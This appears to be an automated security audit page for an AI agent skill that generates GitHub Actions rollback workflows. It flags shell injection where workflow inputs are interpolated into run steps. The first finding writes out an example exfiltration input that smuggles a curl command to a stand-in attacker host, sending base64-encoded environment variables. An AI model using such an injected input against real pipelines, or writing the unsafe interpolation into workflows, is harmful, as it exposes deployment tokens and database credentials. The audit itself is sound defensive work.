Skills
skills/monkey1sai/openai-cli/rollback-workflow-builder/Gen Agent Trust Hub

rollback-workflow-builder

Fail

Audited by Gen Agent Trust Hub on Feb 16, 2026

Risk Level: HIGHCOMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Vulnerability to shell injection in GitHub Actions workflows.
  • In the rollback.yml template, the step Verify version exists uses git rev-parse ${{ github.event.inputs.version }}. Direct interpolation of inputs into a shell script is a critical security flaw. An attacker could provide a version string like v1.0; curl http://attacker.com/$(env | base64) to exfiltrate secrets.
  • Similar injection points exist in the Deploy rollback step: ./scripts/deploy.sh ${{ github.event.inputs.environment }}.
  • The Database Migration Rollback step also suffers from this: TARGET=${{ github.event.inputs.migration }} followed by execution.
  • [COMMAND_EXECUTION] (MEDIUM): Potential Script Injection in github-script.
  • The incident issue creation logic directly interpolates user inputs (environment, version, reason) into the issue body and title. While limited by the GitHub API, this allows for sophisticated Markdown injection or UI redressing attacks within the repository's issue tracker.
  • [DATA_EXFILTRATION] (LOW): Access to sensitive environment variables.
  • The templates correctly use secrets (e.g., DEPLOY_TOKEN, KUBECONFIG, DATABASE_URL), but the aforementioned shell injection vulnerabilities make these secrets trivial to exfiltrate.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 16, 2026, 08:48 PM